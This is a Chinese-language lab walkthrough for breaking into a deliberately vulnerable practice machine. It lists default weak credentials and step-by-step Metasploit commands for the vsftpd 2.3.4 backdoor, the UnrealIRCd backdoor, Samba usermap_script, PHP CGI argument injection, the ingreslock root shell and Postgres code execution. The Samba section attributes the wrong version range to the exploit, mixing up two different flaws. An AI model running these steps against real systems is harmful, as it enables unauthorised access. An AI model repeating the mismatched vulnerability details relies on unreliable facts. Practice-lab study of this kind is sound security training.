一、信息收集
nmap掃描靶機信息
?
二、弱口令
1.系統弱口令
在Kali Linux中使用telnet遠程連接靶機
?
?輸入賬號密碼msfadmin即可登錄
2.MySQL弱口令
使用mysql -h 靶機IP地址即可連接
?
3.PostgreSQL弱密碼登錄
輸入psql -h 192.168.110.134 -U postgres
密碼為postgres
輸入\q可以退出
?
4.VNC弱口令
?
二、漏洞利用
一下漏洞利用工具基本均為MSF
1.Samba MS-RPC Shell命令注入
此漏洞允許遠程攻擊者在易受攻擊的Samba服務器上上傳和執行惡意代碼。它影響了Samba版3.5.0到4.6.4(包括在內),并隨Samba 4.6.5的發布進行了修補。
1.使用模塊use exploit/multi/samba/usermap_script2.設置參數set rhost 靶機IP地址3.執行run4.執行命令查看目錄ls
?
2.vsftpd后門
vsftpd后門漏洞指的是vsftpd(Very Secure FTP Daemon)軟件的一個安全漏洞,也被稱“Backdoor-VSFTPd”或“vsftpd 2.3.4 Backdoor”。
這個漏洞最初發現于2011年,并影響了vsftpd版本2.3.4。攻擊者可以利用該漏洞通過一個特定的用戶名進行登錄,然后在無需經過認證的情況下獲得系統訪問權限。
1.MSF中使用以下模塊use exploit/unix/ftp/vsftpd_234_backdoor2.設置靶機IPset rhost 靶機IP3.執行并查看runls
?
3.UnreallRCd后門
UnrealIRCd是一種常見的開源IRC服務器軟件,被用于構建IRC(Internet Relay Chat)網絡。在過去的幾年中,UnrealIRCd曾發現過一個后門漏洞,被稱為“UnrealIRCd后門”或“Unreal3.2.8.1Backdoor”。
這個后門漏洞于2010年被公開揭露。攻擊者利用這個后門可以在受影響的UnrealIRCd服務器上獲取遠程執行代碼的權限,也可以用于執行各種惡意活動,如監控聊天內容、獲取敏感信息等。
1.搜索模塊search unreal ircd2.搜索payload,并使用一下payloadcmd/unix/bind_perl 3.設置參數set rhost 靶機IP地址4.執行run
?
4.PHP CGI參數注入執行漏洞
PHP CGI 參數注入執行漏洞是一種安全漏洞,它影響在以 CGI 模塊方式運行的 Web 服務器上的PHP 程序。該漏洞的根本原因是在使用 CGI 模塊處理 PHP 腳本時,未正確過濾和處理用戶輸入導致的參數注入漏洞。
攻擊者利用這個漏洞可以通過特制的 URL 參數注入惡意代碼,執行任意的命令或訪問系統敏感文件,甚至可能導致服務器完全被入侵控制。
1.搜索模塊srach php_cgi2.使用模塊并設置參數use exploit/multi/http/php_cgi_arg_injectionset rhost 靶機IP地址3.執行run
?
5.Ingreslock后門
Ingreslock后門程序運行在1524端口,連接到1524端口就能直接獲得root權限,經常用于入侵一個暴露的服務器;直接使用telnet命令獲取權限
?
6.Postgres共享庫代碼任意執行
1.搜索模塊use exploit/linux/postgres/postgres_payload 2.設置參數set rhost 靶機IPset lhost kali的IP3.執行參數
run